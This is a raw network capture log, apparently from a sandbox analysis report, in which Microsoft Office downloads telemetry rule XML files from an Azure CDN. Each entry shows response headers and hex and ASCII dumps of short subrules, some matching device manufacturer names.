                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:55 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                        x-ms-request-id: 7090c7f2-e01e-000c-3ea1-428e36000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063855Z-174f7845968pf68xhC1EWRr4h8000000146000000000dzup
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:55 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        47192.168.2.84985113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:56 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:56 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 420
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                        x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063856Z-174f7845968frfdmhC1EWRxxbw00000013zg00000000dvx6
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:56 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        48192.168.2.84985213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:56 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:56 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:56 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                        x-ms-request-id: c0407c6d-d01e-0082-369d-43e489000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063856Z-174f7845968frfdmhC1EWRxxbw000000145g000000002kq4
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        49192.168.2.84985313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:56 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:56 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                        x-ms-request-id: b5d3fb3c-c01e-000b-6fb4-42e255000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063856Z-174f78459685m244hC1EWRgp2c00000013xg0000000043pp
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:57 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        50192.168.2.84985413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:56 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:57 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                        x-ms-request-id: 716ae074-c01e-0046-576f-432db9000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063857Z-174f7845968psccphC1EWRuz9s00000014dg000000000ez9
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:57 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        51192.168.2.84985513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:57 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:57 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 423
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                        x-ms-request-id: 3b8b6251-d01e-0049-3c33-44e7dc000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063857Z-174f7845968nxc96hC1EWRspw800000013tg0000000068v8
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:58 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        52192.168.2.84985613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:58 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:58 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 478
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                        x-ms-request-id: ef6d0e99-401e-0067-3dc7-4309c2000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063858Z-174f7845968n2hr8hC1EWR9cag00000013t0000000001u55
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:59 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        53192.168.2.84985813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:58 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:58 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                        x-ms-request-id: cdcb5222-c01e-0014-44bd-42a6a3000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063858Z-174f7845968cdxdrhC1EWRg0en0000001430000000002g3d
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        54192.168.2.84985913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:58 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:59 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 400
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                        x-ms-request-id: 241a7da4-a01e-00ab-50cc-439106000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063859Z-174f7845968xlwnmhC1EWR0sv800000013w0000000007qby
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:59 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        55192.168.2.84985713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:58 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:59 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                        x-ms-request-id: 13e6cbbb-001e-005a-04a3-43c3d0000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063859Z-174f7845968pf68xhC1EWRr4h800000014a0000000005n1s
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
